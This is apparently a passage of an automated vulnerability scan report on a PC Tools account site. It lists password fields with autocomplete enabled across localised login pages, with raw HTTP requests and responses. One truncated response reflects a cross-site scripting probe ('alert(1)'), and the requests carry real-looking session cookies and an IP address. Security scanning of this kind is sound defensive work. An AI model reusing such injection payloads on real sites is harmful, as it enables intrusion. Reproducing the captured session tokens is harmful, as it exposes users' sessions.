Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www1.pctools.com:8080
Date: Mon, 21 Mar 2011 01:18:02 GMT
Connection: keep-alive
Content-Length: 22251

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
</8e134;alert(1)//0c318281ed77126a3/">
...[SNIP]...

2. Password field with autocomplete enabled  previous  next
There are 12 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


2.1. https://secure.pctools.com/br/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /br/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /br/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 20637
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - Minha Conta </title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/br/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.2. https://secure.pctools.com/cn/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /cn/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cn/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 19885
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/cn/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.3. https://secure.pctools.com/de/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /de/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /de/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:56 GMT
Content-Length: 21010
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - Benutzerkonto</title>
   <meta http-equiv="content-type" cont
...[SNIP]...
</p>
<form id="login" method="post" action="/de/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.4. https://secure.pctools.com/es/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /es/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /es/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:56 GMT
Content-Length: 21120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>Mi cuenta de PC Tools
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/es/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.5. https://secure.pctools.com/fr/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /fr/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /fr/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 21061
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/fr/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.6. https://secure.pctools.com/it/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /it/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /it/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 20557
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - Account personale </title>
   <meta http-equiv="content-type"
...[SNIP]...
</p>
<form id="login" method="post" action="/it/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.7. https://secure.pctools.com/jp/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /jp/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jp/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 20899
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools -.....................
</title>
   <meta http-equiv="content-t
...[SNIP]...
</p>
<form id="login" method="post" action="/jp/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.8. https://secure.pctools.com/kr/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /kr/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /kr/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:13:57 GMT
Content-Length: 19837
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/kr/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.9. https://secure.pctools.com/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myaccount/ HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; mbox=session#1300668855394-755649#1300671728|PC#1300668855394-755649.17#1301879468|check#true#1300669928; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300669873828-New%7C1321405873828%3B%20event69%3Devent69%7C1321405873830%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:13 GMT
Connection: keep-alive
Content-Length: 20887

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account
</title>
   <meta http-equiv="content-type" conte
...[SNIP]...
</p>
<form id="login" method="post" action="/myaccount/">
   <label class="fieldlabel" for="username">
...[SNIP]...
</label>
       <input class="textinput" name="password" type="password">
<input name="remember" type="checkbox" value="1">
...[SNIP]...

2.10. https://secure.pctools.com/nl/myaccount/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /nl/myaccount/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /nl/myaccount/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
